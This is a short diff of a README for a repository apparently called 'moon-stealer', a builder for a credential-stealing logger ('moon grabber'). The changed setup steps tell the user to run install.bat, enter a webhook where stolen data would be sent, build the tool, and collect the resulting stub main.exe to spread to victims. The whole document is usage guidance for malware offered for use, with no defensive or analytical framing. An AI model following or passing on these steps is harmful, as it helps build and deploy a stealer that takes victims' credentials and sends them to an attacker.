dannythehacker/moon-stealer/README.md

 ## Setup

 1. Download moon grabber
-2. Run builder.py
+2. Run install.bat
 3. enter your webhook
+4. Click build (give it time)
-4. it will build the logger for you. when done, check the moon grabber folder for a folder called dist.
+5. it will build the logger for you. when done, check the moon grabber folder for a folder called dist.
 6. open and find your stub file main.exe

 Enjoy!